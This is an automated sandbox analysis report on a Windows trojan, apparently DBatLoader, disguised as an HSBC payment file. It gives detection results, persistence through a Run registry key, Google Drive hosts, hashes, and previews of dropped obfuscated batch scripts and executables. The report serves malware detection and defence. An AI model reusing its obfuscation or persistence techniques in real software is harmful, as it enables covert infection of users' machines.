                      | HSBC_PAY.SCR.exe | 100% | Joe Sandbox ML | |

                      | Source | Detection | Scanner | Label |
                      | C:\Users\Public\Libraries\Ktnfnozu.PIF | 100% | Avira | HEUR/AGEN.1325882 |
                      | C:\Users\Public\Libraries\Ktnfnozu.PIF | 100% | Joe Sandbox ML | |
                      | C:\Users\Public\Libraries\Ktnfnozu.PIF | 50% | ReversingLabs | Win32.Trojan.ModiLoader |
                      | C:\Users\Public\Libraries\uzonfntK.pif | 3% | ReversingLabs | |
                      No Antivirus matches
                      No Antivirus matches
                      No Antivirus matches
                      | Name | IP | Active | Malicious | Antivirus Detection | Reputation |
                      | drive.google.com | 142.250.184.238 | true | false | | high |
                      | drive.usercontent.google.com | 142.250.185.129 | true | false | | high |
                      | Name | Source | Malicious | Antivirus Detection | Reputation |
                      | http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0 | HSBC_PAY.SCR.exe, 00000000.00000002.1719635955.0000000021816000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698454245.000000007F0A0000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1723167222.000000007F5E0000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1717955033.00000000207A4000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1719371809.00000000216DE000.00000004.00000020.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698278721.000000007F103000.00000004.00001000.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000002.1906626349.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000002.1960770240.0000000021090000.00000004.00000020.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000003.1845495166.0000000000742000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 00000008.00000001.1848189708.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, Ktnfnozu.PIF, 0000000B.00000003.1935639045.00000000007AC000.00000004.00000020.00020000.00000000.sdmp, Ktnfnozu.PIF, 0000000B.00000003.1935639045.0000000000804000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 0000000E.00000002.2255713355.00000000007F0000.00000040.00000400.00020000.00000000.sdmp | false | | high |
                      | https://drive.usercontent.google.com/ | HSBC_PAY.SCR.exe, 00000000.00000002.1704021459.0000000000659000.00000004.00000020.00020000.00000000.sdmp | false | | high |
                      | https://sectigo.com/CPS0 | HSBC_PAY.SCR.exe, 00000000.00000002.1719635955.0000000021816000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698454245.000000007F0A0000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1723167222.000000007F5E0000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1717955033.00000000207A4000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1719371809.00000000216DE000.00000004.00000020.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698278721.000000007F103000.00000004.00001000.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000002.1906626349.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000002.1960770240.0000000021090000.00000004.00000020.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000003.1845495166.0000000000742000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 00000008.00000001.1848189708.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, Ktnfnozu.PIF, 0000000B.00000003.1935639045.00000000007AC000.00000004.00000020.00020000.00000000.sdmp, Ktnfnozu.PIF, 0000000B.00000003.1935639045.0000000000804000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 0000000E.00000002.2255713355.00000000007F0000.00000040.00000400.00020000.00000000.sdmp | false | | high |
                      | http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0# | HSBC_PAY.SCR.exe, 00000000.00000002.1719635955.0000000021816000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698454245.000000007F0A0000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1723167222.000000007F5E0000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1717955033.00000000207A4000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1719371809.00000000216DE000.00000004.00000020.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698278721.000000007F103000.00000004.00001000.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000002.1906626349.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000002.1960770240.0000000021090000.00000004.00000020.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000003.1845495166.0000000000742000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 00000008.00000001.1848189708.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, Ktnfnozu.PIF, 0000000B.00000003.1935639045.00000000007AC000.00000004.00000020.00020000.00000000.sdmp, Ktnfnozu.PIF, 0000000B.00000003.1935639045.0000000000804000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 0000000E.00000002.2255713355.00000000007F0000.00000040.00000400.00020000.00000000.sdmp | false | | high |
                      | http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0 | HSBC_PAY.SCR.exe, 00000000.00000002.1719635955.0000000021816000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698454245.000000007F0A0000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1723167222.000000007F5E0000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1717955033.00000000207A4000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1719371809.00000000216DE000.00000004.00000020.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698278721.000000007F103000.00000004.00001000.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000002.1906626349.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000002.1960770240.0000000021090000.00000004.00000020.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000003.1845495166.0000000000742000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 00000008.00000001.1848189708.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, Ktnfnozu.PIF, 0000000B.00000003.1935639045.00000000007AC000.00000004.00000020.00020000.00000000.sdmp, Ktnfnozu.PIF, 0000000B.00000003.1935639045.0000000000804000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 0000000E.00000002.2255713355.00000000007F0000.00000040.00000400.00020000.00000000.sdmp | false | | high |
                      | http://ocsp.sectigo.com0 | HSBC_PAY.SCR.exe, 00000000.00000002.1719635955.0000000021816000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698454245.000000007F0A0000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1723167222.000000007F5E0000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1717955033.00000000207A4000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1719371809.00000000216DE000.00000004.00000020.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698278721.000000007F103000.00000004.00001000.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000002.1906626349.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000002.1960770240.0000000021090000.00000004.00000020.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000003.1845495166.0000000000742000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 00000008.00000001.1848189708.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, Ktnfnozu.PIF, 0000000B.00000003.1935639045.00000000007AC000.00000004.00000020.00020000.00000000.sdmp, Ktnfnozu.PIF, 0000000B.00000003.1935639045.0000000000804000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 0000000E.00000002.2255713355.00000000007F0000.00000040.00000400.00020000.00000000.sdmp | false | | high |
                      | https://drive.google.com/ | HSBC_PAY.SCR.exe, 00000000.00000002.1704021459.000000000059E000.00000004.00000020.00020000.00000000.sdmp | false | | high |
                      | http://ocsp.sectigo.com0C | HSBC_PAY.SCR.exe, 00000000.00000002.1719635955.0000000021816000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698454245.000000007F0A0000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1723167222.000000007F5E0000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1717955033.00000000207A4000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1719371809.00000000216DE000.00000004.00000020.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698278721.000000007F103000.00000004.00001000.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000002.1906626349.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000002.1960770240.0000000021090000.00000004.00000020.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000003.1845495166.0000000000742000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 00000008.00000001.1848189708.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, Ktnfnozu.PIF, 0000000B.00000003.1935639045.00000000007AC000.00000004.00000020.00020000.00000000.sdmp, Ktnfnozu.PIF, 0000000B.00000003.1935639045.0000000000804000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 0000000E.00000002.2255713355.00000000007F0000.00000040.00000400.00020000.00000000.sdmp | false | | high |
                      | http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0# | HSBC_PAY.SCR.exe, 00000000.00000002.1719635955.0000000021816000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698454245.000000007F0A0000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1723167222.000000007F5E0000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1717955033.00000000207A4000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1719371809.00000000216DE000.00000004.00000020.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698278721.000000007F103000.00000004.00001000.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000002.1906626349.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000002.1960770240.0000000021090000.00000004.00000020.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000003.1845495166.0000000000742000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 00000008.00000001.1848189708.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, Ktnfnozu.PIF, 0000000B.00000003.1935639045.00000000007AC000.00000004.00000020.00020000.00000000.sdmp, Ktnfnozu.PIF, 0000000B.00000003.1935639045.0000000000804000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 0000000E.00000002.2255713355.00000000007F0000.00000040.00000400.00020000.00000000.sdmp | false | | high |
                      | http://www.pmail.com0 | HSBC_PAY.SCR.exe, 00000000.00000002.1719635955.0000000021816000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1720114378.0000000021DE0000.00000004.00000020.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698454245.000000007F0A0000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1723167222.000000007F5E0000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1702719653.000000007EFEA000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698278721.000000007F103000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1717955033.000000002080C000.00000004.00001000.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000002.1906626349.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, uzonfntK.pif, 00000008.00000001.1848189708.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, Ktnfnozu.PIF, 0000000B.00000002.2056661280.00000000207C3000.00000004.00001000.00020000.00000000.sdmp, uzonfntK.pif, 0000000E.00000002.2255713355.00000000007F0000.00000040.00000400.00020000.00000000.sdmp, uzonfntK.pif.0.dr | false | | high |
                      | IP | Domain | Country | ASN | ASN Name | Malicious |
                      | 142.250.185.129 | drive.usercontent.google.com | United States | 15169 | GOOGLEUS | false |
                      | 142.250.184.238 | drive.google.com | United States | 15169 | GOOGLEUS | false |
                                              Joe Sandbox version:41.0.0 Charoite
                                              Analysis ID:1583879
                                              Start date and time:2025-01-03 20:01:06 +01:00
                                              Joe Sandbox product:CloudBasic
                                              Overall analysis duration:0h 8m 9s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                               Number of analysed new started processes:16
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:0
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Sample name:HSBC_PAY.SCR.exe
                                              Detection:MAL
                                              Classification:mal100.troj.evad.winEXE@21/7@2/2
                                              EGA Information:
                                              • Successful, ratio: 100%
                                              HCA Information:
                                              • Successful, ratio: 99%
                                              • Number of executed functions: 60
                                              • Number of non-executed functions: 256
                                              Cookbook Comments:
                                              • Found application associated with file extension: .exe
                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                              • Excluded IPs from analysis (whitelisted): 172.202.163.200, 13.107.246.45
                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                               • Not all processes were analyzed, report is missing behavior information
                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                              • VT rate limit hit for: HSBC_PAY.SCR.exe
                                               | Time | Type | Description |
                                               | 14:01:55 | API Interceptor | 2x Sleep call for process: HSBC_PAY.SCR.exe modified |
                                               | 14:02:15 | API Interceptor | 4x Sleep call for process: Ktnfnozu.PIF modified |
                                               | 14:02:31 | API Interceptor | 9x Sleep call for process: uzonfntK.pif modified |
                                               | 19:02:06 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Ktnfnozu C:\Users\Public\Ktnfnozu.url |
                                               | 19:02:14 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Ktnfnozu C:\Users\Public\Ktnfnozu.url |
                                              No context
                                              No context
                                              No context
                                               | Match | Associated Sample Name / URL | Detection | Threat Name | Context |
                                               | a0e9f5d64349fb13191bc781f81f42e1 | same.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc, Vidar, XWorm | 142.250.185.129, 142.250.184.238 |
                                               | | nayfObR.exe | malicious | LummaC | 142.250.185.129, 142.250.184.238 |
                                               | | 7z91gvU.exe | malicious | LummaC | 142.250.185.129, 142.250.184.238 |
                                               | | ebjtOH70jl.exe | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, Vidar | 142.250.185.129, 142.250.184.238 |
                                               | | PO_B2W984.com | malicious | DBatLoader, MassLogger RAT, PureLog Stealer | 142.250.185.129, 142.250.184.238 |
                                               | | file.exe | malicious | LummaC | 142.250.185.129, 142.250.184.238 |
                                               | | file.exe | malicious | LummaC | 142.250.185.129, 142.250.184.238 |
                                               | | image.exe | malicious | DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger | 142.250.185.129, 142.250.184.238 |
                                               | | MDE_File_Sample_017466bb6ff6d1b5b887f00b4b0a959ffc026bdb.zip | malicious | Unknown | 142.250.185.129, 142.250.184.238 |
                                               | Match | Associated Sample Name / URL | Detection | Threat Name | Context |
                                               | C:\Users\Public\Libraries\uzonfntK.pif | PO_B2W984.com | malicious | DBatLoader, MassLogger RAT, PureLog Stealer | |
                                               | | image.exe | malicious | DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger | |
                                               | | PO_KB#67897.cmd | malicious | DBatLoader, MassLogger RAT, PureLog Stealer | |
                                               | | Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe | malicious | DBatLoader, FormBook | |
                                               | | Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe | malicious | DBatLoader, FormBook | |
                                               | | RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe | malicious | DBatLoader, FormBook | |
                                               | | Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe | malicious | DBatLoader, FormBook | |
                                               | | F.O Pump Istek,Docx.bat | malicious | DBatLoader, PureLog Stealer, Snake Keylogger | |
                                               | | D.G Governor Istek,Docx.exe | malicious | DBatLoader, PureLog Stealer, Snake Keylogger | |
                                               | | qDKTsL1y44.exe | malicious | DBatLoader | |
                                                                  Process:C:\Users\user\Desktop\HSBC_PAY.SCR.exe
                                                                  File Type:MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Ktnfnozu.PIF">), ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):104
                                                                  Entropy (8bit):5.065294406138099
                                                                  Encrypted:false
                                                                  SSDEEP:3:HRAbABGQYmTWAX+rSF55i0XMjiEovsbxWQcy497:HRYFVmTWDyz6yExXc197
                                                                  MD5:42088F5D634452012CBD7209DEF1EA95
                                                                  SHA1:DEFC8AA02E83F2D67FCB6A2B67F56DBAF9A0D21E
                                                                  SHA-256:53710C5A9611D3E2EC0E102F281A37D9DD7481C5F21062BEA79CF9BAD38121E4
                                                                  SHA-512:C337B9C6416B37C8B2EDC6F15C670596287BAEF8E3BE922E003D2ED0DD986D7549E1E33AF238F52E60E081E80624A5582C51105A9FCD05753439DEFFBD3A4C73
                                                                  Malicious:true
                                                                  Preview:[InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Ktnfnozu.PIF"..IconIndex=964159..HotKey=94..
                                                                  Process:C:\Users\user\Desktop\HSBC_PAY.SCR.exe
                                                                  File Type:DOS batch file, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):15789
                                                                  Entropy (8bit):4.658965888116939
                                                                  Encrypted:false
                                                                  SSDEEP:384:wleG1594aKczJRP1dADCDswtJPZ9KZVst1U:LA4aLz08JaJ
                                                                  MD5:CCE3C4AEE8C122DD8C44E64BD7884D83
                                                                  SHA1:C555C812A9145E2CBC66C7C64BA754B0C7528D6D
                                                                  SHA-256:4A12ABB62DD0E5E1391FD51B7448EF4B9DA3B3DC83FF02FB111E15D6A093B5E8
                                                                  SHA-512:EA23EDFB8E3CDA49B78623F6CD8D0294A4F4B9B11570E8478864EBDEE39FCC6B8175B52EB947ED904BE27B5AF2535B9CA08595814557AE569020861A133D827D
                                                                  Malicious:false
                                                                  Preview:.@echo off..@% %e%.%c%o..%h%. .......%o%r.r.r.....% %.......%o%..%f% .%f%o%..s%...... .%e%.r.%t%...o..r.% %.....%"%.......%u%.%T%r..%A%..%j%r........%=%.. o......%s%....o...%e%.....%t%.% %........%"%.r.......o%..%uTAj%"%.. . ..%N%.r r.... %U%... .oo...%M%r.........%j%.....%=%.....o....%=%.%"%r...... %..%uTAj%"% .....%m%..oo%X%.o.. %m%.....or.%w%....%O%.%g%.....%B%.o .r.. %W%..%D%........%t%o.r...%%NUMj%h% ...o.%t%..%t%o......o%p%.........%"% .r%..%uTAj%"% .... ..%G%...o.. ..%n%..rr..%j%..o......%D%...o .r..%R%r.
                                                                  Process:C:\Users\user\Desktop\HSBC_PAY.SCR.exe
                                                                  File Type:DOS batch file, Unicode text, UTF-8 text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):8556
                                                                  Entropy (8bit):4.623706637784657
                                                                  Encrypted:false
                                                                  SSDEEP:192:dSSQx41VVrTlS2owuuWTtkY16Wdhdsu0mYKDCIfYaYuX1fcDuy:Vrhgwuua5vdnQaCIVJF6uy
                                                                  MD5:60CD0BE570DECD49E4798554639A05AE
                                                                  SHA1:BD7BED69D9AB9A20B5263D74921C453F38477BCB
                                                                  SHA-256:CA6A6C849496453990BECEEF8C192D90908C0C615FA0A1D01BCD464BAD6966A5
                                                                  SHA-512:AB3DBDB4ED95A0CB4072B23DD241149F48ECFF8A69F16D81648E825D9D81A55954E5DD9BC46D3D7408421DF30C901B9AD1385D1E70793FA8D715C86C9E800C57
                                                                  Malicious:true
                                                                  Preview:@echo off..set "MJtc=Iet "..@%.r.......%e%...%c%...r....%h%.....%o%........% % .....%o%...%f%.o.%f%......%..s%.......%e%.%t%.. .....% %.rr.. .%"%...%w%......%o%...o..%t%r.....%c%....%=%... . .%s%...... %e%....%t%....% %........ %"% o...%..%wotc%"%.%n% r .%O%...%P%.. ..%t%.%=%...... o..%=%......%"%....r...%..%wotc%"aeeYdDdanR%nOPt%s://"..%wotc%"%..........%a%.%e%......%e%.r..%Y%..%d%.....r....%D%.. %d% ... .%a%.. ...%n%.. ..%R%........%%nOPt%s%...... .%:%.. %/%....%/%r......%"%.....r.%..%wotc%"%...... ...%U%.o..%g%.r.%
                                                                  Process:C:\Users\user\Desktop\HSBC_PAY.SCR.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):615424
                                                                  Entropy (8bit):7.381515340181887
                                                                  Encrypted:false
                                                                  SSDEEP:12288:8Y/sftvhs7OT/3OlYRJDnuvhYIMn0h8OYRBl3VjUcSxxi1nHW8:8Ykftv27Af6yJDuq0fYXvjUtxs1nZ
                                                                  MD5:4E0C09D9A436A3FC3C10575583FE1A85
                                                                  SHA1:A9E1D707DB56EEAFBE5037142EB44312F205AAB8
                                                                  SHA-256:F1A661EBCBEE5A371E8BE7ED62F81B8941C7E4DC9ADC465F7057086C17C66873
                                                                  SHA-512:8D7C764C8FA36595314C544ED08D3F66236856B2DC2F6D2D708855C9BC4D9511E7AFCDE3D54CC7AEE6B9BDD9617D460B0DB7528854C1F8343A5A19F394097240
                                                                  Malicious:true
                                                                  Preview:...Y#..K .. .........$...'.......".....%..........!......%..."...#.....$.......Y#..KV!....'"......Y#..K..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................@.........,.P....Q]..H.F]...p.{ .a.R..........\.....v...i.m?...H.5x....lMS...r.s&.....,.@.(,.U.
                                                                  Process:C:\Users\user\Desktop\HSBC_PAY.SCR.exe
                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):1010688
                                                                  Entropy (8bit):6.910065100990737
                                                                  Encrypted:false
                                                                  SSDEEP:12288:STHHBp6sm4kri5y5dnjxfJz+V3pr+Tykm9W9LDFo+hjr0ls5PsY9Dv7QC:SThoLrimdnjxxwZAk65PvHL
                                                                  MD5:23B640CC7B2CFF45CEEF1C718E7095E0
                                                                  SHA1:DCB684E452D59AF4B1BC7B5DE4BDCCD2B82A967B
                                                                  SHA-256:BFC7A921CD679AB7D693E30C552E352A7C564A75EC7E60B25960C63AE9067938
                                                                  SHA-512:1C77EFD15A2B3DC3E74D8C808CBCBB15122699754169616E68EA024845447EACFEF18B3358ED4D4CA397239F1ED9C9162CD568766BAFF5732C83F65F8293740D
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Avira, Detection: 100%
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  • Antivirus: ReversingLabs, Detection: 50%
                                                                  Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................p....................@..............................................@...........................p...(...P..........................$....................................................w..X............................text...P........................... ..`.itext..|........................... ..`.data...0........ ..................@....bss.....6...0...........................idata...(...p...*..................@....tls....4............F...................rdata...............F..............@..@.reloc..$............H..............@..B.rsrc........P......................@..@.....................l..............@..@................................................................................................
                                                                  Process:C:\Users\user\Desktop\HSBC_PAY.SCR.exe
                                                                  File Type:DOS batch file, Unicode text, UTF-8 text, with very long lines (420), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):46543
                                                                  Entropy (8bit):4.705001079878445
                                                                  Encrypted:false
                                                                  SSDEEP:768:Ud6T6yIssKMyD/LgZ0+9Z2noufIBUEADZQp2H8ZLq:UdQFIssKMyjL4X2T8UbZT
                                                                  MD5:637A66953F03B084808934ED7DF7192F
                                                                  SHA1:D3AE40DFF4894972A141A631900BD3BB8C441696
                                                                  SHA-256:41E1F89A5F96F94C2C021FBC08EA1A10EA30DAEA62492F46A7F763385F95EC20
                                                                  SHA-512:2A0FEDD85722A2701D57AA751D5ACAA36BBD31778E5D2B51A5A1B21A687B9261F4685FD12E894244EA80B194C76E722B13433AD9B649625D2BC2DB4365991EA3
                                                                  Malicious:false
                                                                  Preview:@echo off..set "EPD=sPDet "..@%...... or%e%.........%c%......%h%.........o%o%.or......% %.o.ro...%o%.%f%...r.....%f%....r....%..s%. %e%.....%t% % % rrr....%"%.....%E%....%J%.. ....%O%.%h% .......%=%........%s%.. ..%e%....%t%....% %...o...%"%.%..%EJOh%"%.%r% %H%..%C%........%N%....o ....%=%..........%=% .%"%..%..%EJOh%"%.....%K%.%z%..r%j%........%L%..%c%. o.......%f%. o..%x%.%X%.........r%V%.%J%.....%%rHCN%k%.... ...%"%........%..%EJOh%"%.o.....%a%or%g%..o.... ..%u% ..%P%.....o...%X%.. .......%c% .....%U%.%I%. .
                                                                  Process:C:\Users\user\Desktop\HSBC_PAY.SCR.exe
                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):175800
                                                                  Entropy (8bit):6.631791793070417
                                                                  Encrypted:false
                                                                  SSDEEP:3072:qjyOm0e6/bIhbuwxlEb1MpG+xUEyAn0fYuDGOpPXFZ7on+gUxloDMq:qjyl6ebX45OG+xUEWfYUGOpPXFZ7on+G
                                                                  MD5:22331ABCC9472CC9DC6F37FAF333AA2C
                                                                  SHA1:2A001C30BA79A19CEAF6A09C3567C70311760AA4
                                                                  SHA-256:BDFA725EC2A2C8EA5861D9B4C2F608E631A183FCA7916C1E07A28B656CC8EC0C
                                                                  SHA-512:C7F5BAAD732424B975A426867D3D8B5424AA830AA172ED0FF0EF630070BF2B4213750E123A36D8C5A741E22D3999CA1D7E77C62D4B77D6295B20A38114B7843C
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 3%
                                                                  Joe Sandbox View:
                                                                   • Filename: PO_B2W984.com, Detection: malicious
                                                                   • Filename: image.exe, Detection: malicious
                                                                   • Filename: PO_KB#67897.cmd, Detection: malicious
                                                                   • Filename: Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, Detection: malicious
                                                                   • Filename: Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, Detection: malicious
                                                                   • Filename: RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, Detection: malicious
                                                                   • Filename: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, Detection: malicious
                                                                   • Filename: F.O Pump Istek,Docx.bat, Detection: malicious
                                                                   • Filename: D.G Governor Istek,Docx.exe, Detection: malicious
                                                                   • Filename: qDKTsL1y44.exe, Detection: malicious
                                                                  Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................................................................................................................................................................................................................................................................................PE..L....>.{..................................... ....@.......................... .......c........... ..............................................................H....................................................................................text............................... ..`.data........ ...P..................@....tls.................`..............@....rdata...............b..............@..P.idata... ...........d..............@..@.edata...............|..8...,...@...@..@
                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                  Entropy (8bit):6.910065100990737
                                                                  TrID:
                                                                  • Win32 Executable (generic) a (10002005/4) 99.38%
                                                                  • InstallShield setup (43055/19) 0.43%
                                                                  • Windows Screen Saver (13104/52) 0.13%
                                                                  • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                  File name:HSBC_PAY.SCR.exe
                                                                  File size:1'010'688 bytes
                                                                  MD5:23b640cc7b2cff45ceef1c718e7095e0
